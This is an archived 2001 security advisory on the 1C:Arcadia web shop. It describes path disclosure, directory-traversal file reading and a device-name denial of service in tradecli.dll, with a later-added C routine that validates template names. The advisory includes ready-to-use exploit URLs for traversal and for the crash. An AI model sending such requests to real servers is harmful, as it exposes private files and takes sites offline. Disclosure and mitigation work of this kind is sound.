NERF Advisory #2 - 1C:Arcadia multiple vulnerabilities.

From: ViperSV (vipersvat_private)
Date: Thu Jun 21 2001 - 06:11:46 PDT


                         --== NERF gr0up security advisory #2 ==--
        
          Multiple vulnerabilities in web-shop 1C: Arcadia, in module tradecli.dll
    
    1. Disclosure of the scripts directory path.
    
    Exploit: http://host/scripts/tradecli.dll?template=nonexistfile
    
    This returns an error message that contains the full path to the working directory (usually /scripts).
    Advice for developers: write these messages only to the Event Log, not to the HTTP response.
    
    2. Read any file from the drive.
    
    Description:
    tradecli.dll is the template language interpreter of 1C: Arcadia. It processes the file named in the
    template parameter, interprets tags beginning with an underscore (for example, <_include...>), reads
    everything else unchanged into an ASCIIZ (null-terminated) string and then prints it as the result.
    
    The path passed in the template variable is not checked for special characters, so you can move up the
    directory tree (..\) and give the full path to a file; you can only read files from the drive on which
    the working directory of tradecli.dll lies.
    
    Exploit: http://host/script/tradecli.dll?template=..\..\..\..\..\path\to\file
    
    Reading binary files is awkward, because data after a 0 byte is not printed.
    
    Advice for developers: check that the file named in template exists.
    Advice for admins: restrict the permissions of tradecli.dll.
    
    3. Crash of ISAPI applications (DoS)
    
    Description:
    Opening files named com1, com2, etc. crashes a Windows NT application, which brings down the whole
    application (1C: Arcadia) and consequently the site.
    
    Exploit:
    http://host/scripts/tradecli.dll?template=com1
    http://host/scripts/tradecli.dll?template=com2
    http://host/scripts/tradecli.dll?template=com3
    http://host/scripts/tradecli.dll?template=con
    http://host/scripts/tradecli.dll?template=prn
    http://host/scripts/tradecli.dll?template=aux
    
    Advice for developers: on Windows, before opening a file, you have to check that it exists
    (FindOpen etc.).
    Advice for admins: wait for the next release.
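The developer advice for issues 2 and 3 boils down to one input check on the template parameter before it is opened. The following C code is an added example written for this archive page; it is not code from 1C: Arcadia or from the advisory's author. It assumes a hypothetical fixed template directory and a hypothetical 64-character name limit, and it deliberately uses only portable C so it runs anywhere; on Windows the same check would sit in front of CreateFile/FindFirstFile in the ISAPI DLL. It rejects path separators, drive letters and ".." (the traversal in issue 2) and the reserved DOS device names con, prn, aux, nul, com1-9 and lpt1-9 in any case and with any extension (the device-open crash in issue 3).

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Reserved DOS device names on Windows NT. Opening one of these "files"
 * talks to a device instead of the file system, which is what crashes
 * the ISAPI application in issue 3. */
static const char *const RESERVED[] = {
    "CON", "PRN", "AUX", "NUL",
    "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9",
    "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9",
};

/* Case-insensitive match of the base name (text before the first '.')
 * against the reserved device list: "con.htm" is still the CON device. */
static bool is_reserved_device(const char *name)
{
    char base[16];
    size_t n = 0;
    while (name[n] && name[n] != '.' && n < sizeof base - 1) {
        base[n] = (char)toupper((unsigned char)name[n]);
        n++;
    }
    if (name[n] && name[n] != '.')
        return false;               /* longer than any device name */
    base[n] = '\0';
    for (size_t i = 0; i < sizeof RESERVED / sizeof RESERVED[0]; i++)
        if (strcmp(base, RESERVED[i]) == 0)
            return true;
    return false;
}

/* Validate the value of ?template= before it is opened. Returns true only
 * for a plain file name inside the template directory: no separators, no
 * drive letters, no "..", no reserved device names, printable ASCII only. */
bool template_name_is_safe(const char *name)
{
    if (name == NULL || name[0] == '\0')
        return false;
    if (strlen(name) > 64)          /* hypothetical limit, not from the product */
        return false;
    for (const char *p = name; *p; p++) {
        unsigned char c = (unsigned char)*p;
        if (c == '/' || c == '\\' || c == ':')
            return false;           /* no directories, no drive letters */
        if (c < 0x20 || c > 0x7e)
            return false;           /* control bytes and non-ASCII */
        if (c == '<' || c == '>' || c == '"' || c == '|' || c == '?' || c == '*')
            return false;           /* invalid in Windows file names anyway */
    }
    if (strstr(name, "..") != NULL) /* cannot traverse without a separator, but be explicit */
        return false;
    if (name[0] == '.')
        return false;
    if (is_reserved_device(name))
        return false;
    return true;
}

/* Join the fixed template directory with a validated name.
 * Returns the length written, or -1 if the name was rejected or the
 * buffer is too small. Only the returned path should ever be opened. */
int build_template_path(const char *template_dir, const char *name,
                        char *out, size_t out_len)
{
    if (!template_name_is_safe(name))
        return -1;
    int n = snprintf(out, out_len, "%s\\%s", template_dir, name);
    if (n < 0 || (size_t)n >= out_len)
        return -1;
    return n;
}

int main(void)
{
    /* Constructed sample inputs, including the ones quoted in the advisory. */
    const char *samples[] = {
        "shop.tpl", "..\\..\\..\\..\\..\\path\\to\\file",
        "com1", "con.htm", "prn", "nonexistfile",
    };
    char path[260];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int n = build_template_path("C:\\scripts\\templates", samples[i],
                                    path, sizeof path);
        printf("%-36s -> %s\n", samples[i], n < 0 ? "rejected" : path);
    }
    return 0;
}
```

Note that a plain but missing name such as nonexistfile still passes the check; the open then fails, and that failure is exactly the case from issue 1, so the error text with the working directory belongs in the Event Log and the client should get only a generic error.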
    
    ----------------------------------------------
    Bug found by buggzy, NERF Security gr0up, 2001
    www.nerf.ru, buggzyat_private 
    



    This archive was generated by hypermail 2b30 : Thu Jun 21 2001 - 16:55:09 PDT